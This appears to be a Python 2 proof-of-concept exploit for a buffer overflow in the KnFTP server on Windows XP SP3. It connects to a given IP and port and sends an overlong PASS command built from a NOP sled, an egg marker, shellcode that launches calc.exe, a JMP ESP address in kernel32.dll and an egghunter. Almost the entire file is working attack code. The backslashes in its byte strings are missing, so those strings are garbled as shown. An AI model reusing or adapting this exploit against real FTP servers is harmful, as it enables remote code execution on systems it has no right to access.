#!/usr/bin/python
# tested on windows xp sp3
# overwrites EIP
# seh is overwritten with larger payloads
# knftpd.exe is the only non safeseh module
import sys,socket

print "n====================="
print "KnFTP Buffer Overflow"
print "   Written by Blake  "
print "=====================n"

if len(sys.argv) !=3:
	print "[*] Usage: %s <ip> <port>" % sys.argv[0]
	sys.exit(0)

target = sys.argv[1]
port = int(sys.argv[2])

# 271 bytes of space for shellcode
# 227 bytes windows/exec CMD => calc.exe
shellcode =(
"xb8xe8xaax5exc0xdbxd6xd9x74x24xf4x5bx31xc9xb1"
"x33x31x43x12x03x43x12x83x03x56xbcx35x2fx4fxc8"
"xb6xcfx90xabx3fx2axa1xf9x24x3fx90xcdx2fx6dx19"
"xa5x62x85xaaxcbxaaxaax1bx61x8dx85x9cx47x11x49"
"x5exc9xedx93xb3x29xcfx5cxc6x28x08x80x29x78xc1"
"xcfx98x6dx66x8dx20x8fxa8x9ax19xf7xcdx5cxedx4d"
"xcfx8cx5exd9x87x34xd4x85x37x45x39xd6x04x0cx36"
"x2dxfex8fx9ex7fxffxbexdex2cx3ex0fxd3x2dx06xb7"
"x0cx58x7cxc4xb1x5bx47xb7x6dxe9x5ax1fxe5x49xbf"
"x9ex2ax0fx34xacx87x5bx12xb0x16x8fx28xccx93x2e"
"xffx45xe7x14xdbx0exb3x35x7axeax12x49x9cx52xca"
"xefxd6x70x1fx89xb4x1exdex1bxc3x67xe0x23xccxc7"
"x89x12x47x88xcexaax82xedx21xe1x8fx47xaaxacx45"
"xdaxb7x4exb0x18xcexccx31xe0x35xccx33xe5x72x4a"
"xafx97xebx3fxcfx04x0bx6axacxcbx9fxf6x1dx6ex18"
"x9cx61")

# 32 byte egghunter
egghunter =(
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8"
"x54x30x30x57" # egg - W00T
"x8bxfaxafx75xeaxafx75xe7xffxe7")

egg = "x54x30x30x57x54x30x30x57"
buffer = "x90" * (271 - len(egg + shellcode))
eip = "x13x44x87x7c" 	# 7C874413 JMP ESP - kernel32.dll
nops = "x90" * 8

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port) 
try:
	s.connect((target,port))
	print "[+] Sending payload"
	s.send("USER blake rn")
	s.recv(1024)
	s.send("PASS " + buffer + egg + shellcode + eip + nops + egghunter + "rn")
	s.recv(1024)
	s.close()
	print "[+] Payload sent successfully"
	raw_input("[+] Press any key to exitn")
except:
	print "[+] Could not connect to %s!" % target
	sys.exit(0)